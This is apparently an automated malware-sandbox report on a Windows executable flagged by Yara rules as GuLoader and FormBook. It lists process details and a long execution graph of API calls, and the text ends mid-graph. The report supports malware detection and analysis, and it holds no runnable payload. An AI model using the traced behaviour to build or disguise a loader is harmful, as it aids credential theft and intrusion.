                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2401247870.00000000049AA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:11:10:15
                                                    Start date:05/11/2024
                                                    Path:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\0GuwV0t2UU.exe"
                                                    Imagebase:0x400000
                                                    File size:695'648 bytes
                                                    MD5 hash:4EA3D3A468F53CA1B57D8C2DB7EB3037
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3145283903.0000000037460000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:20.2%
                                                      Dynamic/Decrypted Code Coverage:13.4%
                                                      Signature Coverage:16%
                                                      Total number of Nodes:1613
                                                      Total number of Limit Nodes:50
                                                      execution_graph 4243 401bc0 4244 401c11 4243->4244 4245 401bcd 4243->4245 4247 401c16 4244->4247 4248 401c3b GlobalAlloc 4244->4248 4246 4023af 4245->4246 4251 401be4 4245->4251 4249 4066df 21 API calls 4246->4249 4256 401c56 4247->4256 4281 4066a2 lstrcpynW 4247->4281 4262 4066df 4248->4262 4253 4023bc 4249->4253 4279 4066a2 lstrcpynW 4251->4279 4253->4256 4282 405d02 4253->4282 4255 401c28 GlobalFree 4255->4256 4258 401bf3 4280 4066a2 lstrcpynW 4258->4280 4260 401c02 4286 4066a2 lstrcpynW 4260->4286 4276 4066ea 4262->4276 4263 406931 4264 40694a 4263->4264 4309 4066a2 lstrcpynW 4263->4309 4264->4256 4266 406902 lstrlenW 4266->4276 4267 4067fb GetSystemDirectoryW 4267->4276 4268 4066df 15 API calls 4268->4266 4272 406811 GetWindowsDirectoryW 4272->4276 4273 4068a3 lstrcatW 4273->4276 4275 4066df 15 API calls 4275->4276 4276->4263 4276->4266 4276->4267 4276->4268 4276->4272 4276->4273 4276->4275 4278 406873 SHGetPathFromIDListW CoTaskMemFree 4276->4278 4287 406570 4276->4287 4292 406a96 GetModuleHandleA 4276->4292 4298 406950 4276->4298 4307 4065e9 wsprintfW 4276->4307 4308 4066a2 lstrcpynW 4276->4308 4278->4276 4279->4258 4280->4260 4281->4255 4283 405d17 4282->4283 4284 405d63 4283->4284 4285 405d2b MessageBoxIndirectW 4283->4285 4284->4256 4285->4284 4286->4256 4310 40650f 4287->4310 4290 4065d4 4290->4276 4291 4065a4 RegQueryValueExW RegCloseKey 4291->4290 4293 406ab2 4292->4293 4294 406abc GetProcAddress 4292->4294 4314 406a26 GetSystemDirectoryW 4293->4314 4295 406acb 4294->4295 4295->4276 4297 406ab8 4297->4294 4297->4295 4304 40695d 4298->4304 4299 4069d3 4300 4069d8 CharPrevW 4299->4300 4302 4069f9 4299->4302 4300->4299 4301 4069c6 CharNextW 4301->4299 4301->4304 4302->4276 4304->4299 4304->4301 4305 4069b2 CharNextW 4304->4305 4306 4069c1 CharNextW 4304->4306 4317 405f9e 4304->4317 4305->4304 4306->4301 4307->4276 4308->4276 4309->4264 4311 40651e 4310->4311 4312 406522 4311->4312 4313 406527 RegOpenKeyExW 4311->4313 4312->4290 4312->4291 4313->4312 4315 406a48 wsprintfW LoadLibraryExW 4314->4315 4315->4297 4318 405fa4 4317->4318 4319 405fba 4318->4319 4320 405fab CharNextW 4318->4320 4319->4304 4320->4318 5425 406dc0 5427 406c44 5425->5427 5426 4075af 5427->5426 5428 406cc5 GlobalFree 5427->5428 5429 406cce GlobalAlloc 5427->5429 5430 406d45 GlobalAlloc 5427->5430 5431 406d3c GlobalFree 5427->5431 5428->5429 5429->5426 5429->5427 5430->5426 5430->5427 5431->5430 5432 402641 5433 402dcb 21 API calls 5432->5433 5434 402648 5433->5434 5437 406192 GetFileAttributesW CreateFileW 5434->5437 5436 402654 5437->5436 4461 4025c3 4473 402e0b 4461->4473 4464 402da9 21 API calls 4465 4025d6 4464->4465 4466 4025e5 4465->4466 4471 402953 4465->4471 4467 4025f2 RegEnumKeyW 4466->4467 4468 4025fe RegEnumValueW 4466->4468 4469 40261a RegCloseKey 4467->4469 4468->4469 4470 402613 4468->4470 4469->4471 4470->4469 4474 402dcb 21 API calls 4473->4474 4475 402e22 4474->4475 4476 40650f RegOpenKeyExW 4475->4476 4477 4025cd 4476->4477 4477->4464 4943 4015c8 4944 402dcb 21 API calls 4943->4944 4945 4015cf SetFileAttributesW 4944->4945 4946 4015e1 4945->4946 4947 405cc8 ShellExecuteExW 4948 401fc9 4949 402dcb 21 API calls 4948->4949 4950 401fcf 4949->4950 4951 405727 28 API calls 4950->4951 4952 401fd9 4951->4952 4953 405c85 2 API calls 4952->4953 4954 401fdf 4953->4954 4955 402002 CloseHandle 4954->4955 4959 402953 4954->4959 4963 406b41 WaitForSingleObject 4954->4963 4955->4959 4958 401ff4 4960 402004 4958->4960 4961 401ff9 4958->4961 4960->4955 4968 4065e9 wsprintfW 4961->4968 4964 406b5b 4963->4964 4965 406b6d GetExitCodeProcess 4964->4965 4966 406ad2 2 API calls 4964->4966 4965->4958 4967 406b62 WaitForSingleObject 4966->4967 4967->4964 4968->4955 5445 404acb 5446 404b01 5445->5446 5447 404adb 5445->5447 5449 404688 8 API calls 5446->5449 5448 404621 22 API calls 5447->5448 5450 404ae8 SetDlgItemTextW 5448->5450 5451 404b0d 5449->5451 5450->5446 5455 401a4d lstrcmpW 5456 401a41 5455->5456 5056 40254f 5057 402e0b 21 API calls 5056->5057 5058 402559 5057->5058 5059 402dcb 21 API calls 5058->5059 5060 402562 5059->5060 5061 40256d RegQueryValueExW 5060->5061 5062 402953 5060->5062 5063 40258d 5061->5063 5064 402593 RegCloseKey 5061->5064 5063->5064 5067 4065e9 wsprintfW 5063->5067 5064->5062 5067->5064 5457 40204f 5458 402dcb 21 API calls 5457->5458 5459 402056 5458->5459 5460 406a96 5 API calls 5459->5460 5461 402065 5460->5461 5462 402081 GlobalAlloc 5461->5462 5464 4020f1 5461->5464 5463 402095 5462->5463 5462->5464 5465 406a96 5 API calls 5463->5465 5466 40209c 5465->5466 5467 406a96 5 API calls 5466->5467 5468 4020a6 5467->5468 5468->5464 5472 4065e9 wsprintfW 5468->5472 5470 4020df 5473 4065e9 wsprintfW 5470->5473 5472->5470 5473->5464 5474 4021cf 5475 402dcb 21 API calls 5474->5475 5476 4021d6 5475->5476 5477 402dcb 21 API calls 5476->5477 5478 4021e0 5477->5478 5479 402dcb 21 API calls 5478->5479 5480 4021ea 5479->5480 5481 402dcb 21 API calls 5480->5481 5482 4021f4 5481->5482 5483 402dcb 21 API calls 5482->5483 5484 4021fe 5483->5484 5485 40223d CoCreateInstance 5484->5485 5486 402dcb 21 API calls 5484->5486 5489 40225c 5485->5489 5486->5485 5487 401423 28 API calls 5488 40231b 5487->5488 5489->5487 5489->5488 5490 6e9f170d 5496 6e9f15b6 5490->5496 5492 6e9f176b GlobalFree 5493 6e9f1725 5493->5492 5494 6e9f1740 5493->5494 5495 6e9f1757 VirtualFree 5493->5495 5494->5492 5495->5492 5498 6e9f15bc 5496->5498 5497 6e9f15c2 5497->5493 5498->5497 5499 6e9f15ce GlobalFree 5498->5499 5499->5493 5500 401a55 5501 402dcb 21 API calls 5500->5501 5502 401a5e ExpandEnvironmentStringsW 5501->5502 5503 401a72 5502->5503 5505 401a85 5502->5505 5504 401a77 lstrcmpW 5503->5504 5503->5505 5504->5505 5178 4023d7 5179 4023e5 5178->5179 5180 4023df 5178->5180 5182 4023f3 5179->5182 5183 402dcb 21 API calls 5179->5183 5181 402dcb 21 API calls 5180->5181 5181->5179 5184 402401 5182->5184 5186 402dcb 21 API calls 5182->5186 5183->5182 5185 402dcb 21 API calls 5184->5185 5187 40240a WritePrivateProfileStringW 5185->5187 5186->5184 5506 404757 lstrcpynW lstrlenW 5507 4014d7 5508 402da9 21 API calls 5507->5508 5509 4014dd Sleep 5508->5509 5511 402c4f 5509->5511 5188 402459 5189 402461 5188->5189 5190 40248c 5188->5190 5191 402e0b 21 API calls 5189->5191 5192 402dcb 21 API calls 5190->5192 5193 402468 5191->5193 5194 402493 5192->5194 5196 402472 5193->5196 5197 4024a0 5193->5197 5200 402e89 5194->5200 5198 402dcb 21 API calls 5196->5198 5199 402479 RegDeleteValueW RegCloseKey 5198->5199 5199->5197 5201 402e9d 5200->5201 5203 402e96 5200->5203 5201->5203 5204 402ece 5201->5204 5203->5197 5205 40650f RegOpenKeyExW 5204->5205 5206 402efc 5205->5206 5207 402f0c RegEnumValueW 5206->5207 5208 402f2f 5206->5208 5215 402fa6 5206->5215 5207->5208 5209 402f96 RegCloseKey 5207->5209 5208->5209 5210 402f6b RegEnumKeyW 5208->5210 5211 402f74 RegCloseKey 5208->5211 5213 402ece 6 API calls 5208->5213 5209->5215 5210->5208 5210->5211 5212 406a96 5 API calls 5211->5212 5214 402f84 5212->5214 5213->5208 5214->5215 5216 402f88 RegDeleteKeyW 5214->5216 5215->5203 5216->5215 5517 40175a 5518 402dcb 21 API calls 5517->5518 5519 401761 SearchPathW 5518->5519 5520 40177c 5519->5520 5521 401d5d 5522 402da9 21 API calls 5521->5522 5523 401d64 5522->5523 5524 402da9 21 API calls 5523->5524 5525 401d70 GetDlgItem 5524->5525 5526 40265d 5525->5526 5534 6e9f1000 5537 6e9f101b 5534->5537 5538 6e9f15b6 GlobalFree 5537->5538 5539 6e9f1020 5538->5539 5540 6e9f1027 GlobalAlloc 5539->5540 5541 6e9f1024 5539->5541 5540->5541 5542 6e9f15dd 3 API calls 5541->5542 5543 6e9f1019 5542->5543 5544 4047e0 5545 404912 5544->5545 5547 4047f8 5544->5547 5546 40497c 5545->5546 5548 404a46 5545->5548 5553 40494d GetDlgItem SendMessageW 5545->5553 5546->5548 5549 404986 GetDlgItem 5546->5549 5550 404621 22 API calls 5547->5550 5555 404688 8 API calls 5548->5555 5551 4049a0 5549->5551 5552 404a07 5549->5552 5554 40485f 5550->5554 5551->5552 5557 4049c6 SendMessageW LoadCursorW SetCursor 5551->5557 5552->5548 5558 404a19 5552->5558 5577 404643 EnableWindow 5553->5577 5560 404621 22 API calls 5554->5560 5556 404a41 5555->5556 5581 404a8f 5557->5581 5562 404a2f 5558->5562 5563 404a1f SendMessageW 5558->5563 5565 40486c CheckDlgButton 5560->5565 5562->5556 5567 404a35 SendMessageW 5562->5567 5563->5562 5564 404977 5578 404a6b 5564->5578 5575 404643 EnableWindow 5565->5575 5567->5556 5570 40488a GetDlgItem 5576 404656 SendMessageW 5570->5576 5572 4048a0 SendMessageW 5573 4048c6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5572->5573 5574 4048bd GetSysColor 5572->5574 5573->5556 5574->5573 5575->5570 5576->5572 5577->5564 5579 404a79 5578->5579 5580 404a7e SendMessageW 5578->5580 5579->5580 5580->5546 5584 405cc8 ShellExecuteExW 5581->5584 5583 4049f5 LoadCursorW SetCursor 5583->5552 5584->5583 5585 6e9f103d 5586 6e9f101b 5 API calls 5585->5586 5587 6e9f1056 5586->5587 5588 402663 5589 402692 5588->5589 5590 402677 5588->5590 5591 4026c2 5589->5591 5592 402697 5589->5592 5593 402da9 21 API calls 5590->5593 5595 402dcb 21 API calls 5591->5595 5594 402dcb 21 API calls 5592->5594 5600 40267e 5593->5600 5596 40269e 5594->5596 5597 4026c9 lstrlenW 5595->5597 5605 4066c4 WideCharToMultiByte 5596->5605 5597->5600 5599 4026b2 lstrlenA 5599->5600 5601 40270c 5600->5601 5603 406273 5 API calls 5600->5603 5604 4026f6 5600->5604 5602 406244 WriteFile 5602->5601 5603->5604 5604->5601 5604->5602 5605->5599 4478 403665 SetErrorMode GetVersionExW 4479 4036f1 4478->4479 4480 4036b9 GetVersionExW 4478->4480 4481 403748 4479->4481 4482 406a96 5 API calls 4479->4482 4480->4479 4483 406a26 3 API calls 4481->4483 4482->4481 4484 40375e lstrlenA 4483->4484 4484->4481 4485 40376e 4484->4485 4486 406a96 5 API calls 4485->4486 4487 403775 4486->4487 4488 406a96 5 API calls 4487->4488 4489 40377c 4488->4489 4490 406a96 5 API calls 4489->4490 4491 403788 #17 OleInitialize SHGetFileInfoW 4490->4491 4566 4066a2 lstrcpynW 4491->4566 4494 4037d7 GetCommandLineW 4567 4066a2 lstrcpynW 4494->4567 4496 4037e9 4497 405f9e CharNextW 4496->4497 4498 40380f CharNextW 4497->4498 4506 403821 4498->4506 4499 403923 4500 403937 GetTempPathW 4499->4500 4568 403634 4500->4568 4502 40394f 4503 403953 GetWindowsDirectoryW lstrcatW 4502->4503 4504 4039a9 DeleteFileW 4502->4504 4507 403634 12 API calls 4503->4507 4578 4030f5 GetTickCount GetModuleFileNameW 4504->4578 4505 405f9e CharNextW 4505->4506 4506->4499 4506->4505 4512 403925 4506->4512 4509 40396f 4507->4509 4509->4504 4511 403973 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4509->4511 4510 4039bd 4516 403a64 4510->4516 4517 405f9e CharNextW 4510->4517 4557 403a74 4510->4557 4514 403634 12 API calls 4511->4514 4664 4066a2 lstrcpynW 4512->4664 4519 4039a1 4514->4519 4608 403d74 4516->4608 4532 4039dc 4517->4532 4519->4504 4519->4557 4521 403bc2 4525 405d02 MessageBoxIndirectW 4521->4525 4522 403be6 4523 403c6a ExitProcess 4522->4523 4524 403bee GetCurrentProcess OpenProcessToken 4522->4524 4527 403c06 LookupPrivilegeValueW AdjustTokenPrivileges 4524->4527 4528 403c3a 4524->4528 4526 403bd0 ExitProcess 4525->4526 4527->4528 4534 406a96 5 API calls 4528->4534 4529 403a3a 4665 406079 4529->4665 4530 403a7d 4681 405c6d 4530->4681 4532->4529 4532->4530 4537 403c41 4534->4537 4540 403c56 ExitWindowsEx 4537->4540 4542 403c63 4537->4542 4540->4523 4540->4542 4541 403a9c 4550 403ab4 4541->4550 4685 4066a2 lstrcpynW 4541->4685 4544 40140b 2 API calls 4542->4544 4544->4523 4545 403a59 4680 4066a2 lstrcpynW 4545->4680 4548 403ada wsprintfW 4549 4066df 21 API calls 4548->4549 4549->4550 4550->4548 4563 403b06 4550->4563 4553 403b50 SetCurrentDirectoryW 4731 406462 MoveFileExW 4553->4731 4554 403b16 GetFileAttributesW 4555 403b22 DeleteFileW 4554->4555 4554->4563 4555->4563 4741 403c82 4557->4741 4560 406462 40 API calls 4560->4563 4561 4066df 21 API calls 4561->4563 4563->4548 4563->4550 4563->4553 4563->4554 4563->4557 4563->4560 4563->4561 4564 403bd8 CloseHandle 4563->4564 4686 405bf6 CreateDirectoryW 4563->4686 4689 405c50 CreateDirectoryW 4563->4689 4692 405dae 4563->4692 4735 405c85 CreateProcessW 4563->4735 4738 4069ff FindFirstFileW 4563->4738 4564->4557 4566->4494 4567->4496 4569 406950 5 API calls 4568->4569 4570 403640 4569->4570 4571 40364a 4570->4571 4750 405f71 lstrlenW CharPrevW 4570->4750 4571->4502 4574 405c50 2 API calls 4575 403658 4574->4575 4576 4061c1 2 API calls 4575->4576 4577 403663 4576->4577 4577->4502 4753 406192 GetFileAttributesW CreateFileW 4578->4753 4580 403138 4607 403145 4580->4607 4754 4066a2 lstrcpynW 4580->4754 4582 40315b 4755 405fbd lstrlenW 4582->4755 4586 40316c GetFileSize 4587 403266 4586->4587 4606 403183 4586->4606 4760 403053 4587->4760 4591 4032ab GlobalAlloc 4592 4032c2 4591->4592 4597 4061c1 2 API calls 4592->4597 4594 403303 4595 403053 36 API calls 4594->4595 4595->4607 4596 40328c 4598 403607 ReadFile 4596->4598 4599 4032d3 CreateFileW 4597->4599 4600 403297 4598->4600 4602 40330d 4599->4602 4599->4607 4600->4591 4600->4607 4601 403053 36 API calls 4601->4606 4775 40361d SetFilePointer 4602->4775 4604 40331b 4776 403396 4604->4776 4606->4587 4606->4594 4606->4601 4606->4607 4791 403607 4606->4791 4607->4510 4609 406a96 5 API calls 4608->4609 4610 403d88 4609->4610 4611 403da0 4610->4611 4612 403d8e GetUserDefaultUILanguage 4610->4612 4614 406570 3 API calls 4611->4614 4838 4065e9 wsprintfW 4612->4838 4616 403dd0 4614->4616 4615 403d9e 4839 40404a 4615->4839 4617 403def lstrcatW 4616->4617 4618 406570 3 API calls 4616->4618 4617->4615 4618->4617 4621 406079 18 API calls 4622 403e21 4621->4622 4623 403eb5 4622->4623 4625 406570 3 API calls 4622->4625 4624 406079 18 API calls 4623->4624 4626 403ebb 4624->4626 4627 403e53 4625->4627 4628 403ecb LoadImageW 4626->4628 4629 4066df 21 API calls 4626->4629 4627->4623 4632 403e74 lstrlenW 4627->4632 4636 405f9e CharNextW 4627->4636 4630 403f71 4628->4630 4631 403ef2 RegisterClassW 4628->4631 4629->4628 4635 40140b 2 API calls 4630->4635 4633 403f7b 4631->4633 4634 403f28 SystemParametersInfoW CreateWindowExW 4631->4634 4637 403e82 lstrcmpiW 4632->4637 4638 403ea8 4632->4638 4633->4557 4634->4630 4639 403f77 4635->4639 4641 403e71 4636->4641 4637->4638 4642 403e92 GetFileAttributesW 4637->4642 4640 405f71 3 API calls 4638->4640 4639->4633 4643 40404a 22 API calls 4639->4643 4644 403eae 4640->4644 4641->4632 4645 403e9e 4642->4645 4646 403f88 4643->4646 4847 4066a2 lstrcpynW 4644->4847 4645->4638 4648 405fbd 2 API calls 4645->4648 4649 403f94 ShowWindow 4646->4649 4650 404017 4646->4650 4648->4638 4652 406a26 3 API calls 4649->4652 4848 4057fa OleInitialize 4650->4848 4654 403fac 4652->4654 4653 40401d 4655 404021 4653->4655 4656 404039 4653->4656 4657 403fba GetClassInfoW 4654->4657 4659 406a26 3 API calls 4654->4659 4655->4633 4662 40140b 2 API calls 4655->4662 4658 40140b 2 API calls 4656->4658 4660 403fe4 DialogBoxParamW 4657->4660 4661 403fce GetClassInfoW RegisterClassW 4657->4661 4658->4633 4659->4657 4663 40140b 2 API calls 4660->4663 4661->4660 4662->4633 4663->4633 4664->4500 4856 4066a2 lstrcpynW 4665->4856 4667 40608a 4857 40601c CharNextW CharNextW 4667->4857 4670 403a46 4670->4557 4679 4066a2 lstrcpynW 4670->4679 4671 406950 5 API calls 4677 4060a0 4671->4677 4672 4060d1 lstrlenW 4673 4060dc 4672->4673 4672->4677 4675 405f71 3 API calls 4673->4675 4674 4069ff 2 API calls 4674->4677 4676 4060e1 GetFileAttributesW 4675->4676 4676->4670 4677->4670 4677->4672 4677->4674 4678 405fbd 2 API calls 4677->4678 4678->4672 4679->4545 4680->4516 4682 406a96 5 API calls 4681->4682 4683 403a82 lstrlenW 4682->4683 4684 4066a2 lstrcpynW 4683->4684 4684->4541 4685->4550 4687 405c42 4686->4687 4688 405c46 GetLastError 4686->4688 4687->4563 4688->4687 4690 405c60 4689->4690 4691 405c64 GetLastError 4689->4691 4690->4563 4691->4690 4693 406079 18 API calls 4692->4693 4694 405dce 4693->4694 4695 405dd6 DeleteFileW 4694->4695 4696 405ded 4694->4696 4697 405f24 4695->4697 4698 405f18 4696->4698 4863 4066a2 lstrcpynW 4696->4863 4697->4563 4698->4697 4705 4069ff 2 API calls 4698->4705 4700 405e13 4701 405e26 4700->4701 4702 405e19 lstrcatW 4700->4702 4704 405fbd 2 API calls 4701->4704 4703 405e2c 4702->4703 4706 405e3c lstrcatW 4703->4706 4708 405e47 lstrlenW FindFirstFileW 4703->4708 4704->4703 4707 405f32 4705->4707 4706->4708 4707->4697 4709 405f36 4707->4709 4710 405f0d 4708->4710 4729 405e69 4708->4729 4711 405f71 3 API calls 4709->4711 4710->4698 4712 405f3c 4711->4712 4715 405d66 5 API calls 4712->4715 4714 405ef0 FindNextFileW 4717 405f06 FindClose 4714->4717 4714->4729 4716 405f48 4715->4716 4718 405f62 4716->4718 4719 405f4c 4716->4719 4717->4710 4721 405727 28 API calls 4718->4721 4719->4697 4722 405727 28 API calls 4719->4722 4721->4697 4724 405f59 4722->4724 4723 405dae 64 API calls 4723->4729 4726 406462 40 API calls 4724->4726 4725 405727 28 API calls 4725->4714 4727 405f60 4726->4727 4727->4697 4728 405727 28 API calls 4728->4729 4729->4714 4729->4723 4729->4725 4729->4728 4730 406462 40 API calls 4729->4730 4864 4066a2 lstrcpynW 4729->4864 4865 405d66 4729->4865 4730->4729 4732 403b5f CopyFileW 4731->4732 4733 406476 4731->4733 4732->4557 4732->4563 4876 4062e8 4733->4876 4736 405cc4 4735->4736 4737 405cb8 CloseHandle 4735->4737 4736->4563 4737->4736 4739 406a15 FindClose 4738->4739 4740 406a20 4738->4740 4739->4740 4740->4563 4742 403c93 CloseHandle 4741->4742 4743 403c9d 4741->4743 4742->4743 4744 403cb1 4743->4744 4745 403ca7 CloseHandle 4743->4745 4910 403cdf 4744->4910 4745->4744 4748 405dae 71 API calls 4749 403bb5 OleUninitialize 4748->4749 4749->4521 4749->4522 4751 403652 4750->4751 4752 405f8d lstrcatW 4750->4752 4751->4574 4752->4751 4753->4580 4754->4582 4756 405fcb 4755->4756 4757 405fd1 CharPrevW 4756->4757 4758 403161 4756->4758 4757->4756 4757->4758 4759 4066a2 lstrcpynW 4758->4759 4759->4586 4761 403064 4760->4761 4762 40307c 4760->4762 4765 403074 4761->4765 4766 40306d DestroyWindow 4761->4766 4763 403084 4762->4763 4764 40308c GetTickCount 4762->4764 4795 406ad2 4763->4795 4764->4765 4768 40309a 4764->4768 4765->4591 4765->4607 4794 40361d SetFilePointer 4765->4794 4766->4765 4769 4030a2 4768->4769 4770 4030cf CreateDialogParamW ShowWindow 4768->4770 4769->4765 4799 403037 4769->4799 4770->4765 4772 4030b0 wsprintfW 4802 405727 4772->4802 4775->4604 4777 4033c1 4776->4777 4778 4033a5 SetFilePointer 4776->4778 4813 40349e GetTickCount 4777->4813 4778->4777 4783 40345e 4783->4607 4784 40349e 46 API calls 4785 4033f8 4784->4785 4785->4783 4786 403464 ReadFile 4785->4786 4788 403407 4785->4788 4786->4783 4788->4783 4789 406215 ReadFile 4788->4789 4828 406244 WriteFile 4788->4828 4789->4788 4792 406215 ReadFile 4791->4792 4793 40361a 4792->4793 4793->4606 4794->4596 4796 406aef PeekMessageW 4795->4796 4797 406ae5 DispatchMessageW 4796->4797 4798 406aff 4796->4798 4797->4796 4798->4765 4800 403046 4799->4800 4801 403048 MulDiv 4799->4801 4800->4801 4801->4772 4803 405742 4802->4803 4804 4030cd 4802->4804 4805 40575e lstrlenW 4803->4805 4806 4066df 21 API calls 4803->4806 4804->4765 4807 405787 4805->4807 4808 40576c lstrlenW 4805->4808 4806->4805 4810 40579a 4807->4810 4811 40578d SetWindowTextW 4807->4811 4808->4804 4809 40577e lstrcatW 4808->4809 4809->4807 4810->4804 4812 4057a0 SendMessageW SendMessageW SendMessageW 4810->4812 4811->4810 4812->4804 4814 4035f6 4813->4814 4815 4034cc 4813->4815 4816 403053 36 API calls 4814->4816 4830 40361d SetFilePointer 4815->4830 4822 4033c8 4816->4822 4818 4034d7 SetFilePointer 4824 4034fc 4818->4824 4819 403607 ReadFile 4819->4824 4821 403053 36 API calls 4821->4824 4822->4783 4826 406215 ReadFile 4822->4826 4823 406244 WriteFile 4823->4824 4824->4819 4824->4821 4824->4822 4824->4823 4825 4035d7 SetFilePointer 4824->4825 4831 406c11 4824->4831 4825->4814 4827 4033e1 4826->4827 4827->4783 4827->4784 4829 406262 4828->4829 4829->4788 4830->4818 4832 406c36 4831->4832 4835 406c3e 4831->4835 4832->4824 4833 406cc5 GlobalFree 4834 406cce GlobalAlloc 4833->4834 4834->4832 4834->4835 4835->4832 4835->4833 4835->4834 4836 406d45 GlobalAlloc 4835->4836 4837 406d3c GlobalFree 4835->4837 4836->4832 4836->4835 4837->4836 4838->4615 4840 40405e 4839->4840 4855 4065e9 wsprintfW 4840->4855 4842 4040cf 4843 404103 22 API calls 4842->4843 4845 4040d4 4843->4845 4844 403dff 4844->4621 4845->4844 4846 4066df 21 API calls 4845->4846 4846->4845 4847->4623 4849 40466d SendMessageW 4848->4849 4851 40581d 4849->4851 4850 40466d SendMessageW 4852 405856 OleUninitialize 4850->4852 4853 405844 4851->4853 4854 401389 2 API calls 4851->4854 4852->4653 4853->4850 4854->4851 4855->4842 4856->4667 4858 406039 4857->4858 4859 40604b 4857->4859 4858->4859 4860 406046 CharNextW 4858->4860 4861 405f9e CharNextW 4859->4861 4862 40606f 4859->4862 4860->4862 4861->4859 4862->4670 4862->4671 4863->4700 4864->4729 4873 40616d GetFileAttributesW 4865->4873 4868 405d93 4868->4729 4869 405d81 RemoveDirectoryW 4871 405d8f 4869->4871 4870 405d89 DeleteFileW 4870->4871 4871->4868 4872 405d9f SetFileAttributesW 4871->4872 4872->4868 4874 405d72 4873->4874 4875 40617f SetFileAttributesW 4873->4875 4874->4868 4874->4869 4874->4870 4875->4874 4877 406318 4876->4877 4878 40633e GetShortPathNameW 4876->4878 4903 406192 GetFileAttributesW CreateFileW 4877->4903 4879 406353 4878->4879 4880 40645d 4878->4880 4879->4880 4882 40635b wsprintfA 4879->4882 4880->4732 4884 4066df 21 API calls 4882->4884 4883 406322 CloseHandle GetShortPathNameW 4883->4880 4885 406336 4883->4885 4886 406383 4884->4886 4885->4878 4885->4880 4904 406192 GetFileAttributesW CreateFileW 4886->4904 4888 406390 4888->4880 4889 40639f GetFileSize GlobalAlloc 4888->4889 4890 4063c1 4889->4890 4891 406456 CloseHandle 4889->4891 4892 406215 ReadFile 4890->4892 4891->4880 4893 4063c9 4892->4893 4893->4891 4905 4060f7 lstrlenA 4893->4905 4896 4063e0 lstrcpyA 4899 406402 4896->4899 4897 4063f4 4898 4060f7 4 API calls 4897->4898 4898->4899 4900 406439 SetFilePointer 4899->4900 4901 406244 WriteFile 4900->4901 4902 40644f GlobalFree 4901->4902 4902->4891 4903->4883 4904->4888 4906 406138 lstrlenA 4905->4906 4907 406140 4906->4907 4908 406111 lstrcmpiA 4906->4908 4907->4896 4907->4897 4908->4907 4909 40612f CharNextA 4908->4909 4909->4906 4911 403ced 4910->4911 4912 403cb6 4911->4912 4913 403cf2 FreeLibrary GlobalFree 4911->4913 4912->4748 4913->4912 4913->4913 4920 4015e6 4921 402dcb 21 API calls 4920->4921 4922 4015ed 4921->4922 4923 40601c 4 API calls 4922->4923 4928 4015f6 4923->4928 4924 401656 4926 401688 4924->4926 4927 40165b 4924->4927 4925 405f9e CharNextW 4925->4928 4931 401423 28 API calls 4926->4931 4939 401423 4927->4939 4928->4924 4928->4925 4932 405c50 2 API calls 4928->4932 4934 405c6d 5 API calls 4928->4934 4936 40163c GetFileAttributesW 4928->4936 4938 405bf6 2 API calls 4928->4938 4937 401680 4931->4937 4932->4928 4934->4928 4935 40166f SetCurrentDirectoryW 4935->4937 4936->4928 4938->4928 4940 405727 28 API calls 4939->4940 4941 401431 4940->4941 4942 4066a2 lstrcpynW 4941->4942 4942->4935 5606 405866 5607 405a10 5606->5607 5608 405887 GetDlgItem GetDlgItem GetDlgItem 5606->5608 5610 405a41 5607->5610 5611 405a19 GetDlgItem CreateThread CloseHandle 5607->5611 5651 404656 SendMessageW 5608->5651 5613 405a6c 5610->5613 5614 405a91 5610->5614 5615 405a58 ShowWindow ShowWindow 5610->5615 5611->5610 5612 4058f7 5617 4058fe GetClientRect GetSystemMetrics SendMessageW SendMessageW 5612->5617 5616 405acc 5613->5616 5619 405a80 5613->5619 5620 405aa6 ShowWindow 5613->5620 5621 404688 8 API calls 5614->5621 5653 404656 SendMessageW 5615->5653 5616->5614 5627 405ada SendMessageW 5616->5627 5625 405950 SendMessageW SendMessageW 5617->5625 5626 40596c 5617->5626 5628 4045fa SendMessageW 5619->5628 5623 405ac6 5620->5623 5624 405ab8 5620->5624 5622 405a9f 5621->5622 5630 4045fa SendMessageW 5623->5630 5629 405727 28 API calls 5624->5629 5625->5626 5631 405971 SendMessageW 5626->5631 5632 40597f 5626->5632 5627->5622 5633 405af3 CreatePopupMenu 5627->5633 5628->5614 5629->5623 5630->5616 5631->5632 5635 404621 22 API calls 5632->5635 5634 4066df 21 API calls 5633->5634 5636 405b03 AppendMenuW 5634->5636 5637 40598f 5635->5637 5638 405b20 GetWindowRect 5636->5638 5639 405b33 TrackPopupMenu 5636->5639 5640 405998 ShowWindow 5637->5640 5641 4059cc GetDlgItem SendMessageW 5637->5641 5638->5639 5639->5622 5643 405b4e 5639->5643 5644 4059bb 5640->5644 5645 4059ae ShowWindow 5640->5645 5641->5622 5642 4059f3 SendMessageW SendMessageW 5641->5642 5642->5622 5646 405b6a SendMessageW 5643->5646 5652 404656 SendMessageW 5644->5652 5645->5644 5646->5646 5647 405b87 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5646->5647 5649 405bac SendMessageW 5647->5649 5649->5649 5650 405bd5 GlobalUnlock SetClipboardData CloseClipboard 5649->5650 5650->5622 5651->5612 5652->5641 5653->5613 5654 404e68 5655 404e94 5654->5655 5656 404e78 5654->5656 5658 404ec7 5655->5658 5659 404e9a SHGetPathFromIDListW 5655->5659 5665 405ce6 GetDlgItemTextW 5656->5665 5661 404eb1 SendMessageW 5659->5661 5662 404eaa 5659->5662 5660 404e85 SendMessageW 5660->5655 5661->5658 5663 40140b 2 API calls 5662->5663 5663->5661 5665->5660 5666 401c68 5667 402da9 21 API calls 5666->5667 5668 401c6f 5667->5668 5669 402da9 21 API calls 5668->5669 5670 401c7c 5669->5670 5671 401c91 5670->5671 5672 402dcb 21 API calls 5670->5672 5673 401ca1 5671->5673 5674 402dcb 21 API 